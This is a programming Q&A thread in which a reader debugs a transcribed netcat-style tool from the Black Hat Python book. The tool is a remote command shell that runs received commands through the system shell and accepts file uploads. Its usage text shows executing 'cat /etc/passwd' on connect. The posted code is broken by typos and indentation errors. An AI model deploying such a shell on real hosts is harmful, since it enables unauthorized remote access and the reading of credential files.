# Code from black hat python book not running?

Tags: python, command-line

The following code is a script shown in the black hat python book but it is seemingly not working. I am reading an ebook and after rewriting the code over five times, I still can't get it to work (the ebook doesn't allow copy/pasting for some reason
). I have tried all of the examples shown in the code and the book but I get the same results - the line goes black for about a second and then it creates the normal command line prompt ("C:\Python27") on the next line. I am currently using Windows 10. In the book the user entered "bhp.py -t localhost -p 9999" and it gave the user a custom command shell - Didn't work for me... Thanks for viewing my question

```
import socket
import threading
import sys
import getopt
import subprocess

listen             = False
command            = False
upload             = False
execute            = ""
target             = ""
upload_destination = ""
port               = 0

def usage():
    print ("BHP Net Tool")
    print
    print ("USAGE: bhpnet.py -t target_host -p port")
    print ("-l --listen              - listen on [host]:[port] for incoming connections")
    print ("-e --execute=file_to_run - execute the given file upon receiving a connection")
    print ("-c --command             - initialize a command shell")
    print ("-u --upload=destination  - upon recieving connection upload a file and write to [destination]")
    print
    print
    print ("Examples: ")
    print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -c")
    print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -u=c:\\target.exe")
    print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -e=\"cat /etc/passwd\"")
    print ("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135")
    sys.exit(0)

def main():
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()

    try:
        opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu",     ["help","listen","execute","target","port","command","upload"])
    except getopt.GetoptError as err:
        print str(err)
        usage()

    for o,a in opts:
        if o in ("-h","--help"):
            usage()
        elif o in ("-l","--listen"):
            listen = True   
        elif o in ("-e", "--execute"):
            execute = a
        elif o in ("-c", "--commandshell"):
            command = True
        elif o in ("-u", "--upload:"):
            upload_destination = a
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            port = int(a)
        else:
            assert False, "Unhandled Option"

if not listen and len(target) and port > 0:
    buffer = sys.stfin.read()
    client_sender(buffer)

if listen:
    server_loop()
def client_sender(buffer):

    client = socket.socket(socket.AF_INET, socket.SOCK_STEAM)

    try:
        client.connect((target,port))

        if len(buffer):
            client.send(buffer)

        while True:
            recv_len = 1
            response = ""

            while recv_len:

                data     = client.recv(4096)
                recv_len = len(data)
                response+= data

                if recv_len < 4096:
                    break

            print response,

            buffer = raw_input("")
            buffer += "\n"

            client.send(buffer)

    except:

            print "[*] Exception! Exciting!."

            client.close()

def server_loop():
    global target

    if not len(target):
        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCL_STEAM)
    server.bind((target,port))
    server.listen(5)

    while True:
        client_socket, addr = server.accept()

        client_thread = threading.Thread(target=client_handler,args=(client_socket,))
        client_thread.start()

def run_command(command):

    command = command.rstrip()

    try:
            output = subprocess.check_output(command,stderr=subprocess. STDOUT, shell=True)
    except:
            output = "Failed to execute command.\r\n"

    return output

def client_handler(client_socket):
    global upload
    global execute
    global command

    if len(upload_destination):

            file_buffer = ""
    while True:
        data = client_socket.recv(1024)

        if not data:
            break
        else:
            file_buffer += data

    try:
        file_descriptor = open(upload_destination,"wb")
        file_descriptor.write(file_buffer)
        file_descriptor.close()

        client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
    except:
        client_socket.send("Failed to save file to %s\r\n" % upload_destination)

if len(execute):

        output = run_command(execute)

        client_socket.send(output)

if command:

        while True:
            client_socket.send("<BHP:#> ")

            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)

            response = run_command(cmd_buffer)

            client_socket.send(response)

main()
```

Comment: The indentation is suspicious, there are several blocks of code that are not part of a function.  Check that the indentation is correct.

Answer (score 0):

What I think your problem is, is that you've written the code that started with function `def client_sender(buffer)` under the function `def main()`. But, as it is noted in the book you should have written it above the function `def main()` instead.

Try that.

Comment: Why would it matter what order the functions are declared in?

Comment: It does in a few languages. In Python it's enough if all functions being used are defined before calling `main`.

Answer (score 0):

You need to indent this block by 4 spaces:

```
if not listen and len(target) and port > 0:
    buffer = sys.stfin.read()
    client_sender(buffer)

if listen:
    server_loop()
```

Then you have a typo: `stfin` should be `stdin`.
After changing this this command: `python script.py -t localhost -p 9999` starts the script and falls into the line `buffer = sys.stdin.read()`, but it does not print a prompt, is that correct? Otherwise it needs some more fixing.

Answer (score 0):

The problem is the keyboard language, in spanish is Contro-Z and Enter.

Comment: How does this answer the question?